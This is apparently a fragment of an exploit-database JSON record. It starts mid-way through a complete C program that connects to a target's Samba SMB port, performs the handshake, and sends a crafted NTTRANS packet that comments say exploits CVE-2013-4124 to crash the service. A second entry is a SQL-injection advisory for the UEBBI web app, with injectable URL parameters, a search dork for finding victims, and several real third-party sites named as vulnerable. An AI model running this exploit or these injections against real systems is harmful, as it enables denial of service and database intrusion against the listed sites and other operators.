negprot_reply_header\r\n{ uint8 wordcount;\r\n uint8 dialectindex[2];\r\n uint8 securitymode;\r\n uint16 maxmpxcount, maxvccount;\r\n uint32 maxbufsize, maxrawsize, sessionid, capabilities, timelow, timehigh;\r\n uint16 timezone;\r\n uint8 keylen;\r\n uint16 bytecount;\r\n};\r\n \r\nstruct sesssetupx_request_header\r\n{ uint8 wordcount, command, reserved;\r\n uint8 offset[2], maxbufsize[2], maxmpxcount[2], vcnumber[2];\r\n uint8 sessionid[4];\r\n uint8 ipasswdlen[2], passwdlen[2];\r\n uint8 reserved2[4], capabilities[4];\r\n};\r\n \r\nstruct sesssetupx_reply_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], action[2], bytecount[2];\r\n};\r\n \r\nstruct tconx_request_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];\r\n};\r\n \r\nstruct tconx_reply_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], supportbits[2], bytecount[2];\r\n};\r\n \r\nstruct nttrans_primary_request_header\r\n{ \r\n uint8 wordcount; \r\n uint8 maxsetupcount; \r\n uint8 flags[2];\r\n uint8 totalparamcount[4]; \r\n uint8 totaldatacount[4];\r\n uint8 maxparamcount[4];\r\n uint8 maxdatacount[4];\r\n uint8 paramcount[4];\r\n uint8 paramoffset[4];\r\n uint8 datacount[4];\r\n uint8 dataoffset[4]; // XXXX 0xf000000\r\n uint8 setupcount; \r\n uint8 function[2]; \r\n uint8 bytecount[2];\r\n};\r\n \r\n#define SMB_NEGPROT 0x72\r\n#define SMB_SESSSETUPX 0x73\r\n#define SMB_TCONX 0x75\r\n#define SMB_TRANS2 0x32\r\n#define SMB_NTTRANS 0xA0\r\n#define SMB_NTTRANSCREATE 0x01\r\n#define SMB_TRANS2OPEN 0x00\r\n#define SMB_SESSIONREQ 0x81\r\n#define SMB_SESSION 0x00\r\n \r\nuint32 sessionid, PARAMBASE = 0x81c0000;\r\nchar *tconx_servername;\r\nint tid, pid, uid;\r\n \r\n#define STACKBOTTOM 0xbfffffff\r\n#define STACKBASE 0xbfffd000\r\n#define TOTALCOUNT ((int)(STACKBOTTOM - STACKBASE))\r\n \r\nchar *netbios_encode_name(char *name, int type)\r\n{ char plainname[16], c, *encoded, *ptr;\r\n int i, len = strlen(name);\r\n if ((encoded = malloc(34)) == NULL)\r\n { fprintf(stderr, \"malloc() failed\\n\");\r\n exit(-1);\r\n }\r\n ptr = encoded;\r\n strncpy(plainname, name, 15);\r\n *ptr++ = 0x20;\r\n for (i = 0; i < 16; i++)\r\n { if (i == 15) c = type;\r\n else \r\n { if (i < len) c = toupper(plainname[i]);\r\n else c = 0x20;\r\n }\r\n *ptr++ = (((c >> 4) & 0xf) + 0x41);\r\n *ptr++ = ((c & 0xf) + 0x41);\r\n }\r\n *ptr = '\\0';\r\n return encoded;\r\n}\r\n \r\nvoid construct_nbt_session_header(char *ptr, uint8 type, uint8 flags, uint32 len)\r\n{ struct nbt_session_header *nbt_hdr = (struct nbt_session_header *)ptr;\r\n uint16 nlen;\r\n \r\n// geen idee of dit de juiste manier is, maar 't lijkt wel te werken ..\r\n if (len > 65535) nlen = 65535;\r\n else nlen = htons(len);\r\n \r\n memset((void *)nbt_hdr, '\\0', sizeof (struct nbt_session_header));\r\n \r\n nbt_hdr->type = type;\r\n nbt_hdr->flags = flags;\r\n memcpy(&nbt_hdr->len, &nlen, sizeof (uint16));\r\n}\r\n \r\n// caller zorgt voor juiste waarde van ptr.\r\nvoid construct_smb_base_header(char *ptr, uint8 command, uint8 flags, uint16 flags2, uint16 tid, uint16 pid, \r\n uint16 uid, uint16 mid)\r\n{ struct smb_base_header *base_hdr = (struct smb_base_header *)ptr;\r\n \r\n memset(base_hdr, '\\0', sizeof (struct smb_base_header));\r\n \r\n memcpy(base_hdr->protocol, \"\\xffSMB\", 4);\r\n \r\n base_hdr->command = command;\r\n base_hdr->flags = flags;\r\n \r\n memcpy(&base_hdr->flags2, &flags2, sizeof (uint16));\r\n memcpy(&base_hdr->tid, &tid, sizeof (uint16));\r\n memcpy(&base_hdr->pid, &pid, sizeof (uint16));\r\n memcpy(&base_hdr->uid, &uid, sizeof (uint16));\r\n memcpy(base_hdr->mid, &mid, sizeof (uint16));\r\n}\r\n \r\nvoid construct_sesssetupx_header(char *ptr)\r\n{ struct sesssetupx_request_header *sx_hdr = (struct sesssetupx_request_header *)ptr;\r\n uint16 maxbufsize = 0xffff, maxmpxcount = 2, vcnumber = 31257, pwdlen = 0;\r\n uint32 capabilities = 0x50;\r\n \r\n memset(sx_hdr, '\\0', sizeof (struct sesssetupx_request_header));\r\n \r\n sx_hdr->wordcount = 13;\r\n sx_hdr->command = 0xff;\r\n memcpy(&sx_hdr->maxbufsize, &maxbufsize, sizeof (uint16));\r\n memcpy(&sx_hdr->vcnumber, &vcnumber, sizeof (uint16));\r\n memcpy(&sx_hdr->maxmpxcount, &maxmpxcount, sizeof (uint16));\r\n memcpy(&sx_hdr->sessionid, &sessionid, sizeof (uint32));\r\n memcpy(&sx_hdr->ipasswdlen, &pwdlen, sizeof (uint16));\r\n memcpy(&sx_hdr->passwdlen, &pwdlen, sizeof (uint16));\r\n memcpy(&sx_hdr->capabilities, &capabilities, sizeof (uint32));\r\n}\r\n \r\n/*\r\nstruct tconx_request_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];\r\n -- uint16 bytecount geeft lengte van volgende fields aan: char password[], path[], service[];\r\n}; */\r\nvoid construct_tconx_header(char *ptr)\r\n{ struct tconx_request_header *tx_hdr = (struct tconx_request_header *)ptr;\r\n uint16 passwdlen = 1, bytecount;\r\n char *data;\r\n \r\n memset(tx_hdr, '\\0', sizeof (struct tconx_request_header));\r\n \r\n bytecount = strlen(tconx_servername) + 15; \r\n \r\n if ((data = malloc(bytecount)) == NULL)\r\n { fprintf(stderr, \"malloc() failed, aborting!\\n\");\r\n exit(-1);\r\n }\r\n memcpy(data, \"\\x00\\x5c\\x5c\", 3);\r\n memcpy(data + 3, tconx_servername, strlen(tconx_servername));\r\n memcpy(data + 3 + strlen(tconx_servername), \"\\x5cIPC\\x24\\x00\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\", 12);\r\n \r\n tx_hdr->wordcount = 4;\r\n tx_hdr->xcommand = 0xff;\r\n \r\n memcpy(&tx_hdr->passwdlen, &passwdlen, sizeof (uint16));\r\n memcpy(&tx_hdr->bytecount, &bytecount, sizeof (uint16));\r\n \r\n memcpy(ptr + sizeof (struct tconx_request_header), data, bytecount);\r\n}\r\n \r\nvoid nbt_session_request(int fd, char *clientname, char *servername)\r\n{ \r\n char *cn, *sn;\r\n char packet[sizeof (struct nbt_session_header) + (34 * 2)];\r\n \r\n construct_nbt_session_header(packet, SMB_SESSIONREQ, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n \r\n tconx_servername = servername;\r\n \r\n sn = netbios_encode_name(servername, 0x20);\r\n cn = netbios_encode_name(clientname, 0x00);\r\n \r\n memcpy(packet + sizeof (struct nbt_session_header), sn, 34);\r\n memcpy(packet + (sizeof (struct nbt_session_header) + 34), cn, 34);\r\n \r\n write(fd, packet, sizeof (packet));\r\n close(fd);\r\n \r\n free(cn);\r\n free(sn);\r\n}\r\n \r\nvoid process_nbt_session_reply(int fd)\r\n{ struct nbt_session_header nbt_hdr;\r\n char *errormsg;\r\n uint8 errorcode;\r\n int size, len = 0;\r\n \r\n if ((size = read(fd, &nbt_hdr, sizeof (nbt_hdr))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n if (size != sizeof (nbt_hdr))\r\n { close(fd);\r\n fprintf(stderr, \"read() a broken packet, aborting.\\n\"); \r\n exit(-1);\r\n }\r\n memcpy(&len, &nbt_hdr.len, sizeof (uint16));\r\n \r\n if (len)\r\n { read(fd, (void *)&errorcode, 1); \r\n close(fd);\r\n switch (errorcode)\r\n { case 0x80 : errormsg = \"Not listening on called name\"; break;\r\n case 0x81 : errormsg = \"Not listening for calling name\"; break;\r\n case 0x82 : errormsg = \"Called name not present\"; break;\r\n case 0x83 : errormsg = \"Called name present, but insufficient resources\"; break;\r\n case 0x8f : errormsg = \"Unspecified error\"; break;\r\n default : errormsg = \"Unspecified error (unknown error code received!)\"; break;\r\n }\r\n fprintf(stderr, \"session request denied, reason: '%s' (code %i)\\n\", errormsg, errorcode);\r\n exit(-1);\r\n }\r\n printf(\"session request granted\\n\");\r\n}\r\n \r\nvoid negprot_request(int fd)\r\n{ struct variable_data_header data;\r\n char dialects[] = \"\\x2PC NETWORK PROGRAM 1.0\\x0\\x2MICROSOFT NETWORKS 1.03\\x0\\x2MICROSOFT NETWORKS 3.0\\x0\\x2LANMAN1.0\\x0\" \\\r\n \"\\x2LM1.2X002\\x0\\x2Samba\\x0\\x2NT LANMAN 1.0\\x0\\x2NT LM 0.12\\x0\\x2\"\"FLATLINE'S KWAADWAAR\"; \r\n char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data) + sizeof (dialects)];\r\n int dlen = htons(sizeof (dialects));\r\n \r\n memset(&data, '\\0', sizeof (data));\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n pid = getpid();\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NEGPROT, 8, 1, 0, pid, 0, 1);\r\n \r\n memcpy(&data.bytecount, &dlen, sizeof (uint16));\r\n \r\n memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)), &data, sizeof (data));\r\n memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data)), \r\n dialects, sizeof (dialects));\r\n \r\n if (write(fd, packet, sizeof (packet)) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n}\r\n \r\nvoid process_negprot_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct negprot_reply_header *np_reply_hdr;\r\n char packet[1024];\r\n int size;\r\n uint16 pid_reply;\r\n \r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n np_reply_hdr = (struct negprot_reply_header *)(packet + (sizeof (struct nbt_session_header) + \r\n sizeof (struct smb_base_header)));\r\n \r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n \r\n memcpy(&pid_reply, &base_hdr->pid, sizeof (uint16));\r\n memcpy(&sessionid, &np_reply_hdr->sessionid, sizeof (uint32));\r\n if (base_hdr->command != SMB_NEGPROT || np_reply_hdr->wordcount != 17 || pid_reply != pid)\r\n { close(fd);\r\n fprintf(stderr, \"protocol negotiation failed\\n\");\r\n exit(-1);\r\n }\r\n \r\n printf(\"protocol negotiation complete\\n\");\r\n}\r\n \r\nvoid sesssetupx_request(int fd)\r\n{ uint8 data[] = \"\\x12\\x0\\x0\\x0\\x55\\x6e\\x69\\x78\\x00\\x53\\x61\\x6d\\x62\\x61\";\r\n char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + \r\n sizeof (struct sesssetupx_request_header) + sizeof (data)];\r\n int size;\r\n \r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_SESSSETUPX, 8, 1, 0, pid, 0, 1);\r\n construct_sesssetupx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + \r\n sizeof (struct sesssetupx_request_header), &data, sizeof (data));\r\n \r\n if ((size = write(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n if (size != sizeof (packet))\r\n { close(fd);\r\n fprintf(stderr, \"couldn't write entire packet, aborting!\\n\");\r\n exit(-1);\r\n }\r\n}\r\n \r\nvoid process_sesssetupx_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct sesssetupx_reply_header *sx_hdr;\r\n char packet[1024];\r\n int size, len;\r\n \r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n \r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n sx_hdr = (struct sesssetupx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n \r\n memcpy(&len, &nbt_hdr->len, sizeof (uint16));\r\n memcpy(&uid, &base_hdr->uid, sizeof (uint16));\r\n \r\n if (sx_hdr->xcommand != 0xff && sx_hdr->wordcount != 3)\r\n { close(fd);\r\n fprintf(stderr, \"session setup failed\\n\");\r\n exit(-1);\r\n }\r\n \r\n printf(\"session setup complete, got assigned uid %i\\n\", uid);\r\n}\r\n \r\nvoid tconx_request(int fd)\r\n{ \r\n char *packet;\r\n int size, pktsize = sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) +\r\n sizeof (struct tconx_request_header) + strlen(tconx_servername) + 15;\r\n \r\n if ((packet = malloc(pktsize)) == NULL)\r\n { close(fd);\r\n fprintf(stderr, \"malloc() failed, aborting!\\n\");\r\n exit(-1);\r\n }\r\n \r\n construct_nbt_session_header(packet, SMB_SESSION, 0, pktsize - sizeof (struct nbt_session_header));\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_TCONX, 8, 1, 0, pid, uid, 1);\r\n construct_tconx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n \r\n if ((size = write(fd, packet, pktsize)) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n \r\n free(packet);\r\n \r\n if (size != pktsize)\r\n { close(fd);\r\n fprintf(stderr, \"couldn't write entire packet, aborting!\\n\");\r\n exit(-1);\r\n } \r\n}\r\n \r\nvoid process_tconx_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct tconx_reply_header *tx_hdr;\r\n char packet[1024];\r\n int size, bytecount;\r\n \r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\", strerror(errno), errno);\r\n exit(-errno);\r\n }\r\n \r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n tx_hdr = (struct tconx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n \r\n memcpy(&tid, &base_hdr->tid, sizeof (uint16));\r\n memcpy(&bytecount, &tx_hdr->bytecount, sizeof (uint16));\r\n \r\n printf(\"tree connect complete, got assigned tid %i\\n\", tid);\r\n}\r\n \r\nvoid nttrans_request(int fd) { \r\n // packet = nbt session header + smb base header + nttrans header!\r\n char packet[sizeof (struct nbt_session_header) + \r\n sizeof (struct smb_base_header) + \r\n sizeof (struct nttrans_primary_request_header)];\r\n struct nttrans_primary_request_header nttrans_hdr; // nttrans header!\r\n int size=0;\r\n int function = SMB_NTTRANSCREATE; // NTTRANSCREATE!\r\n int totalparamcount = TOTALCOUNT;\r\n int totaldatacount = 0;\r\n uint8 setupcount = 0;\r\n \r\n memset(&nttrans_hdr, 0, sizeof nttrans_hdr);\r\n \r\n // construct nbt session header\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n // construct smb base header\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NTTRANS, 8, 1, tid, pid, uid, 1);\r\n \r\n // construct nttrans header\r\n nttrans_hdr.paramoffset[0] = '\\x00';\r\n nttrans_hdr.paramoffset[1] = '\\x00';\r\n nttrans_hdr.paramoffset[2] = '\\x10';\r\n nttrans_hdr.paramoffset[3] = '\\xff';\r\n nttrans_hdr.dataoffset[0] = '\\x00'; // XXX data offset 0xff100000 to integer wrap\r\n nttrans_hdr.dataoffset[1] = '\\x00'; // the offset exploits the security bug of CVE-2013-4124\r\n nttrans_hdr.dataoffset[2] = '\\x10'; // samba remote dos\r\n nttrans_hdr.dataoffset[3] = '\\xff';\r\n \r\n nttrans_hdr.wordcount = 19 + setupcount;\r\n memcpy(&nttrans_hdr.function, &function, sizeof (uint16));\r\n memcpy(&nttrans_hdr.totalparamcount, &totalparamcount, sizeof (uint32));\r\n memcpy(&nttrans_hdr.totaldatacount, &totaldatacount, sizeof (uint32));\r\n memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header), &nttrans_hdr, sizeof nttrans_hdr);\r\n \r\n // send samba packet!\r\n size = write(fd, packet, sizeof (packet));\r\n close(fd);\r\n \r\n}\r\n \r\nstatic char banner[]={\r\n\" ___ ___ \\n\" \\\r\n\" / _ \\\\ / _ \\\\ \\n\" \\\r\n\" __ __| (_) || | | | ___ \\n\" \\\r\n\" \\\\ \\\\/ / \\\\__. || | | | / __| \\n\" \\\r\n\" > < / / | |_| || (__ \\n\" \\\r\n\" /_/\\\\_\\\\ /_/ \\\\___/ \\\\___| \\n\" \\\r\n};\r\n \r\nint main(int argc, char *argv[]) {\r\n int fd;\r\n struct sockaddr_in s_in;\r\n char target_ip[16];\r\n int smb_port=139;\r\n \r\n \r\n printf(\"%s\\n\\nsamba nttrans reply exploit\\n\\n\", banner);\r\n \r\n if(argc < 2){\r\n fprintf(stderr, \"samba nttrans reply exploit Usage:\\n\\n./samba_exploit [target ip addr]\\n\\n\");\r\n exit(-1);\r\n }\r\n \r\n strncpy(target_ip, argv[1], 16);\r\n \r\n memset(&s_in, 0, sizeof (s_in));\r\n s_in.sin_family = AF_INET;\r\n s_in.sin_port = htons(smb_port); // samba port=139/tcp\r\n s_in.sin_addr.s_addr = inet_addr(target_ip);\r\n \r\n fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n connect(fd, (struct sockaddr *)&s_in, sizeof (s_in));\r\n \r\n // nbt(netbios over tcpip, nbtstat) session request\r\n nbt_session_request(fd, \"BOSSA\", \"SAMBA\"); // adjust computer names(clientname, servername)\r\n process_nbt_session_reply(fd);\r\n \r\n // protocol negotiation\r\n negprot_request(fd);\r\n process_negprot_reply(fd);\r\n \r\n // session setup\r\n sesssetupx_request(fd); // setup request\r\n process_sesssetupx_reply(fd); // setup reply\r\n \r\n // tree connection setup\r\n tconx_request(fd);\r\n process_tconx_reply(fd);\r\n \r\n // exploit!\r\n printf(\"[*] nttrans reply exploit!\\n\");\r\n nttrans_request(fd);\r\n \r\n close(fd);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2016-04-20] #", "cvss": {"score": 5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "http://0day.today/exploit/21146"}], "packetstorm": [{"lastseen": "2016-11-03T10:27:28", "references": [], "description": "", "edition": 1, "reporter": "the_cyber_nuxbie", "published": "2012-03-09T00:00:00", "title": "UEBBI SQL Injection", "type": "packetstorm", "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-03-09T00:00:00", "id": "PACKETSTORM:110630", "href": "https://packetstormsecurity.com/files/110630/UEBBI-SQL-Injection.html", "sourceData": "`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \n0 _ __ __ __ 1 \n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0 \n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1 \n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0 \n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1 \n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0 \n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1 \n1 \\ \\____/ >> Exploit database separated by exploit 0 \n0 \\/___/ type (local, remote, DoS, etc.) 1 \n1 1 \n0 [+] Official Website: http://www.1337day.com 0 \n1 [+] Support E-mail : mr.inj3ct0r[at]gmail.com 1 \n0 0 \n1 ########################################## 1 \n0 I'm NuxbieCyber Member From Inj3ct0r Team 1 \n1 ########################################## 0 \n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 \n \n[ UEBBI - SQL Injection Vulnerability ] \n \n[x] Author : the_cyber_nuxbie \n[x] Home : www.thecybernuxbie.com \n[x] E-mail : staff@thecybernuxbie.com \n[x] Found : 09 March 2012 @ 07:04 PM. \n[x] Tested : Back|Track 5. \n[x] Dork : inurl:\"/imprimematerias.php?id=\" intext:\"Desenvolvido por Uebbi\" \n______________________________________________________________________________ \n****************************************************************************** \n \n- Info WebApps: \nDesenvolvido por Uebbi - Sites e Sistemas on-line www.uebbi.com.br \n \n- Exploit Report: \nhttp://localhost/imprimematerias.php?id=[SQL Injection] \nhttp://localhost/index.php?pag=noticias&id=[SQL Injection] \nhttp://localhost/index.php?pag=novidades&id=[SQL Injection] \nhttp://localhost/index.php?pag=galeria&id=[SQL Injection] \nhttp://localhost/index.php?pag=livro&id=[SQL Injection] \nhttp://localhost/index.php?pag=ipcevoce&id=[SQL Injection] \nhttp://localhost/index.php?pag=produtos&id=[SQL Injection] \nhttp://localhost/index.php?pag=ondeseaventurar&id=[SQL Injection] \nhttp://localhost/index.php?pag=atividades&id=[SQL Injection] \n,etc... \n \n- Page LogIn: \nhttp://localhost/site/adm/ <--- LogIn Area...!!! \n \n- Sample WebApps Vuln SQLi: \nhttp://ipclaboratorio.com.br/site/index.php?pag=novidades&id=66' + [SQL Injection] \nhttp://clinicapaulodemoura.com.br/index.php?pag=noticias&id=38' + [SQL Injection] \nhttp://dumaia.com.br/index.php?pag=produtos&id=2' + [SQL Injection] \nhttp://trailturismo.com.br/site/imprimematerias.php?id=139' + [SQL Injection] \n,etc... \n \n0day no more... \n\"n0 d0rk f0r k1dd10ts\" \n \n- Aku pengen kuliah nang STIMIK sin*s, tapi aku ora nduwe biaya... \nAdakah kuliah gratis untuk saya, para pemimpin pada korupsi, saya jadi tidak bisa berkesempatan untuk kuliah... \ncr00t G*v*rnm*nt...!!! \n \n- Greetz: \n*** 1337day Inject0r TEAM *** \n...:::' All Member & Staff Inject0r TEAM ':::... \n \n- Greetz To All Exploiters From Indonesian: \n[ Member Of Inj3ct0r & Exploit-DB ] \nAkatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto, EA Ngel, \neidelweiss, Flyff666, g3mbeLz_YCL, Gendenk, gunslinger_, h4ntu, IbnuSina, irvian, Jack, k3m4n9i, k1ngk0n9, k1tk4t, \nk4mtiez, K-159, kecemplungkalen, Mask_magicianz, MISTERFRIBO, M3NW5, Mbah_Semar, mywisdom, Newbie Campuz, Netrondoank, \nNoGe, NTOS-Team, Oli Bekas, OoN_Boy, Pokeng, r3m1ck, S3T4N, s4va, sikunYuk, SENOT, skulmatic, spykit, Sudden_death, \nteam_elite, tempe_mendoan, the_day, tomplixsee, v3n0m, vir0e5, Vrs-hCk, vYc0d, Xr0b0t, y3d1ps, etc... \n \n\"Kalian Telah Mengharumkan Nama INDONESIA Di Dunia IT-Underground\" \n \nMe @ March, 09 2012, GMT +07:04 Solo Raya, Indonesian. \n \n \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/110630/uebbi-sql.txt", "cvss": {"score": 0, "vector": "NONE"}}]}}